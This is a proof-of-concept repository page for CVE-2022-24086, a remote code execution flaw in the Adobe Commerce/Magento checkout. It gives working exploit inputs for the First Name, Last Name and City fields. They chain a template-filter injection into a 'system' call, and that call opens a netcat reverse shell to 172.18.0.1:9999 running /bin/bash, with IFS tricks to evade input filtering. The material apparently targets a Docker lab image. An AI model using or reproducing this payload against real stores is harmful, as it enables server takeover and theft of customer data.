CVE-2022-24086 PoC — Adobe Commerce checkout improper input validation leads to remote code execution

Source

Associated Vulnerability

Description

Proof of concept of CVE-2022-24086

Readme

# CVE-2022-24086

Tested with: magento 2.4.3 and sample data
Docker image: docker.io/bitnami/magento:2.4.3-debian-10-r0


First Name:
~~~
{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}
~~~
Last Name:
~~~
system
~~~
City:
~~~
nc${IFS%??}172.18.0.1${IFS%??}9999${IFS%??}-e${IFS%??}/bin/bash
~~~

Testing rce:

![magento-cve-2022-24-086-callback_func](https://user-images.githubusercontent.com/47446178/208698581-d5a026e4-5465-4325-b98d-5365739174a4.png)

File Snapshot

 [4.0K]  /data/pocs/6403c65c06a64581d2f9bd88d65a45f7537f3604
├── [1.3K]  docker-compose.yml
└── [ 602]  README.md

0 directories, 2 files

Remarks